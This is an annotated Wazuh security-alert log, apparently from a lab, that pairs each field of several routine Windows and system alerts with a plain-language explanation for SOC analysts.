Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS, FAIL or NOT APPLICABLE (when the check could not be evaluated). Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:33.866+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003 – Windows Service

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:33.866+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534073.635871
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:10.0067341Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228512
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:42:10.004 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B5C681E4-1680-4090-A10F-6F4486F58558} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\135.0.3179.85\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:10.004
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

The VSS service is shutting down due to idle timeout.

🧠 What happened? The VSS service is shutting down due to idle timeout.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:34:40.935+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:40.935+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  The VSS service is shutting down due to idle timeout.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60702
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534080.640385
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  VSS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8224
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:29.5025140Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2399
Incremental log record number – handy for timeline order.

data.win.system.processID:  12680
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The VSS service is shutting down due to idle timeout. "
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.binary:  2D20436F64653A2020434F525356434330303030303737322D2043616C6C3A2020434F525356434330303030303735342D205049443A202030303031323638302D205449443A202030303030333530342D20434D443A2020433A5C57494E444F57535C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:43.994+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:43.994+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534143.642170
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp6 127.0.0.1:9200 :::* 1076/java tcp6 127.0.0.1:9300 :::* 1076/java tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.175+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.175+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.643528
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0312732Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260578
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.030 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsCore.dll CreationUtcTime: 2025-04-20 01:55:28.030 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.030
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsCore.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.030
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.191+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.191+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.646493
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0468118Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260579
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.045 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsMsg.dll CreationUtcTime: 2025-04-20 01:55:28.045 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.045
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsMsg.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.045
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.226+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.226+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.649454
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.
